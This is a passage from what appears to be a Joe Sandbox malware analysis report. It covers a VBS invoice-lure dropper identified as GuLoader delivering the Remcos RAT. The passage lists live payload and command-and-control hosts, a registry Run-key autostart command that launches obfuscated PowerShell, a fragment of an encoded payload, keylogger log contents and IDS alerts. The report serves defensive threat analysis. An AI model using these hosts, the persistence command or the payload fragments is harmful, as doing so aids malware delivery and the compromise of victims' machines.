                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore6lBkqpowershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://plieltd.top/Tlles187.deployPpowershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://plieltd.top/msiexec.exe, 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8pmsiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.155.139
                                              		plieltd.topUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              185.236.203.101
                                              		pelele.duckdns.orgRomania
                                              		9009M247GBtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1538533
                                              Start date and time:2024-10-21 14:16:09 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 50s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
                                              renamed because original name is a hash value
                                              Original Sample Name:IMGRO Facturi nepltite 56773567583658567835244234Bandido.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@16/8@4/2
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 86%
                                              • Number of executed functions: 59
                                              • Number of non-executed functions: 18
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target msiexec.exe, PID 1012 because there are no executed function
                                              • Execution Graph export aborted for target powershell.exe, PID 7876 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8168 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              08:16:59API Interceptor88x Sleep call for process: powershell.exe modified
                                              08:18:15API Interceptor846006x Sleep call for process: msiexec.exe modified
                                              13:17:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Sandsynliggrelsens %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)
                                              13:17:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Sandsynliggrelsens %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.155.139rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                185.236.203.101rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                  rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                    17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                        DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                          Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              plieltd.toprIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.155.139
                                                              rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 104.21.56.189
                                                              pelele.duckdns.orgrIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 185.236.203.101
                                                              rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 185.236.203.101

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUShttps://t.ly/N1B0DGet hashmaliciousUnknownBrowse
                                                              • 172.65.251.78
                                                              RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235Get hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.29.144
                                                              Message_2530136.emlGet hashmaliciousUnknownBrowse
                                                              • 1.1.1.1
                                                              https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.19.229.21
                                                              FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe?Get hashmaliciousUnknownBrowse
                                                              • 104.26.5.9
                                                              M247GBrIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 185.236.203.101
                                                              bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 38.202.237.70
                                                              1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • 172.111.244.103
                                                              lsAXde4em3.exeGet hashmaliciousQuasarBrowse
                                                              • 128.0.1.24
                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 45.89.173.108
                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                              • 38.202.225.93
                                                              JVxDWS9r3H.msiGet hashmaliciousMatanbuchusBrowse
                                                              • 193.109.85.43
                                                              YM10RsQfhm.msiGet hashmaliciousMatanbuchusBrowse
                                                              • 193.109.85.31
                                                              R7xCGuaxlx.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 89.238.176.6
                                                              vYGwWQ2LHj.exeGet hashmaliciousUnknownBrowse
                                                              • 89.238.176.6

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eRFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 172.67.155.139
                                                              Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 172.67.155.139
                                                              FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                              • 172.67.155.139
                                                              FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                                              • 172.67.155.139
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.155.139
                                                              Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 172.67.155.139
                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.155.139
                                                              FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                              • 172.67.155.139
                                                              FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 172.67.155.139
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.155.139
                                                              450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                              • 172.67.155.139
                                                              450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                              • 172.67.155.139
                                                              3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                              • 172.67.155.139
                                                              Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                              • 172.67.155.139

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\remcos\logs.dat

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):222
                                                              Entropy (8bit):3.3500554881430897
                                                              Encrypted:false
                                                              SSDEEP:3:rhlKlM+Xl81Ul/NeDl5JWRal2Jl+7R0DAlBG4moojklovDl64oojklovDl6v:6lj8el/NU5YcIeeDAlS1gWA41gWAv
                                                              MD5:0ED8A551138E7759D61B00D87F8AE098
                                                              SHA1:60D73704D7C22341AE357FA9FC80D112F1205F76
                                                              SHA-256:08881EECD678E97ED1BF378599B20F00F81A48057359F8538C5664DAE6BCF245
                                                              SHA-512:9F7B46FF6FA581CD37874399047F1EA188331A95BE9CA2AACC8D6258289431AFFD7BF4CF9874779B137A80C2B41EADB4746FD1F1787B4F16F6F439FA34CD5E4F
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                              Preview:....[.2.0.2.4./.1.0./.2.1. .0.8.:.1.7.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):8003
                                                              Entropy (8bit):4.840877972214509
                                                              Encrypted:false
                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                              MD5:106D01F562D751E62B702803895E93E0
                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                              Malicious:false
                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:NlllulVmdtZ:NllUM
                                                              MD5:013016A37665E1E37F0A3576A8EC8324
                                                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55lrmmve.za3.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipby20gf.uzl.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whax01k5.z3n.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykmc5ace.1ez.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Roaming\Clothesman.Vin

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):486712
                                                              Entropy (8bit):5.870051690785869
                                                              Encrypted:false
                                                              SSDEEP:12288:aJOLSAxyV8bmVrM3HYGFAdw0SfZxQvww+0Mv8FgfX:aJSr88Yo3bAdw3yPg
                                                              MD5:87FF833A255506114FAA969869E18546
                                                              SHA1:86316D90AF91A20BFFD5A586E7AE94BEFE65651D
                                                              SHA-256:47A1FFA66A690B0ADCF95F5A2141629E112EDE25F80DDA1ADEB4F846F2D14BEB
                                                              SHA-512:6C484170C56D52F1F1786C8EB18CCBEBB138C8A1F90B57C509C1E7D5A9FCF1BCCECD4E0754DF6836D9602651094C02C3C58D3C3D0D72B25451952A1DC8091509
                                                              Malicious:false
                                                              Preview:6wJK5XEBm7u11Q8AcQGb6wI2SQNcJATrAtcF6wI37Lm7gqercQGbcQGbgfEgxpdx6wI8eXEBm4Hxm0Qw2usCWbrrAolm6wLuOusCY2a6Rxr9j3EBm+sCNbNxAZtxAZsxynEBm+sC/n+JFAtxAZtxAZvR4usCwU9xAZuDwQRxAZvrAi5dgfkLHWsDfM1xAZvrAmSQi0QkBHEBm+sCZkCJw+sCF4ZxAZuBw1ckOwBxAZvrAl/GukzSWfRxAZtxAZuB6jSyTjLrAlPY6wKR4oHyGCALwnEBm3EBm3EBm+sCdcXrArdU6wI/tYsMEOsC6HZxAZuJDBPrAl4h6wIkNEJxAZvrAuIKgfqcGwUAddNxAZtxAZuJXCQMcQGb6wJJ6IHtAAMAAOsCd5NxAZuLVCQI6wLsg+sC1KKLfCQEcQGbcQGbietxAZtxAZuBw5wAAADrAjj9cQGbU+sC7sJxAZtqQOsClxPrAi2cievrApeQcQGbx4MAAQAAAAB+A+sCG99xAZuBwwABAADrAuENcQGbU+sCGVxxAZuJ63EBm3EBm4m7BAEAAHEBm+sC3sWBwwQBAADrAsS36wLc4lPrAlclcQGbav9xAZvrAjhOg8IFcQGbcQGbMfZxAZtxAZsxyesCFxbrAj1fixpxAZtxAZtBcQGb6wIWdTkcCnXzcQGb6wK8bEbrArs76wILIIB8Cvu4ddzrAiTQcQGbi0QK/OsC80FxAZsp8HEBm+sC9Xj/0nEBm+sCCLu6nBsFAHEBm+sCQZMxwHEBm+sCoCSLfCQMcQGbcQGbgTQHV6T2+OsCUvXrAhMag8AEcQGbcQGbOdB15HEBm3EBm4n76wJPxesCG+b/1+sCMH3rAgm7v6T2+Ff/fx3e6XdBrKbR+NZVg1s++Xc5IpkXS9ZV9SR4td803Ol3eahsZQ478X8d7g2QQiOcNXm+s4fVFpw+eabK9KYN80k9AJSze6j4+XwtovP4CCUHHKB2n57SbHIMkOD7

                                                              Static File Info

                                                              General

                                                              File type:ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.1874057721062155
                                                              TrID:
                                                              • Visual Basic Script (13500/0) 100.00%
                                                              File name:IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
                                                              File size:29'517 bytes
                                                              MD5:a8da570deac5f16a0050802c0da5d7dd
                                                              SHA1:9d8992e3770e41d8a431350e1cef73492dc240ea
                                                              SHA256:c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
                                                              SHA512:7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730
                                                              SSDEEP:384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7
                                                              TLSH:B7D24E080A213FFC581FB7B16BC5B0E096FA0892A5B5E12C37356624F8A6E4EDD34DD5
                                                              File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =

                                                              File Icon

                                                              Icon Hash:68d69b8f86ab9a86

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-21T14:17:40.495655+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449744172.67.155.139443TCP
                                                              2024-10-21T14:17:44.971905+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745185.236.203.10151525TCP
                                                              2024-10-21T14:17:47.995395+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746185.236.203.10151525TCP
                                                              2024-10-21T14:17:51.087230+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449747185.236.203.10151525TCP
                                                              2024-10-21T14:17:54.067087+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748185.236.203.10151525TCP
                                                              2024-10-21T14:17:57.062288+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449750185.236.203.10151525TCP
                                                              2024-10-21T14:17:59.200136+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449751185.236.203.10151525TCP
                                                              2024-10-21T14:18:02.562679+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449758185.236.203.10151525TCP
                                                              2024-10-21T14:18:05.364964+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449769185.236.203.10151525TCP
                                                              2024-10-21T14:18:08.447528+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449788185.236.203.10151525TCP
                                                              2024-10-21T14:18:11.941565+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449806185.236.203.10151525TCP
                                                              2024-10-21T14:18:15.470639+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449823185.236.203.10151525TCP
                                                              2024-10-21T14:18:18.489328+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449843185.236.203.10151525TCP
                                                              2024-10-21T14:18:20.996537+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449863185.236.203.10151525TCP
                                                              2024-10-21T14:18:24.548551+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449874185.236.203.10151525TCP
                                                              2024-10-21T14:18:28.144206+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449895185.236.203.10151525TCP
                                                              2024-10-21T14:18:31.950214+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449914185.236.203.10151525TCP
                                                              2024-10-21T14:18:34.176307+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449933185.236.203.10151525TCP
                                                              2024-10-21T14:18:36.264503+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449945185.236.203.10151525TCP
                                                              2024-10-21T14:18:38.555739+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449958185.236.203.10151525TCP
                                                              2024-10-21T14:18:40.757396+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449971185.236.203.10151525TCP
                                                              2024-10-21T14:18:43.466320+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449984185.236.203.10151525TCP
                                                              2024-10-21T14:18:46.400379+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449999185.236.203.10151525TCP
                                                              2024-10-21T14:18:49.663580+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450011185.236.203.10151525TCP
                                                              2024-10-21T14:18:52.877339+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450022185.236.203.10151525TCP
                                                              2024-10-21T14:18:55.536726+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450034185.236.203.10151525TCP
                                                              2024-10-21T14:18:58.130787+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450036185.236.203.10151525TCP
                                                              2024-10-21T14:19:00.887989+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450037185.236.203.10151525TCP
                                                              2024-10-21T14:19:03.667580+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450038185.236.203.10151525TCP
                                                              2024-10-21T14:19:06.491923+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450039185.236.203.10151525TCP
                                                              2024-10-21T14:19:09.993139+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450040185.236.203.10151525TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 21, 2024 14:17:00.848578930 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:00.848625898 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:00.848695993 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:00.854650974 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:00.854671001 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:01.479129076 CEST44349737172.67.155.139192.168.2.4
                                                              Oct 21, 2024 14:17:01.479470015 CEST49737443192.168.2.4172.67.155.139
                                                              Oct 21, 2024 14:17:01.514213085 CEST49737443192.168.2.4172.67.155.139
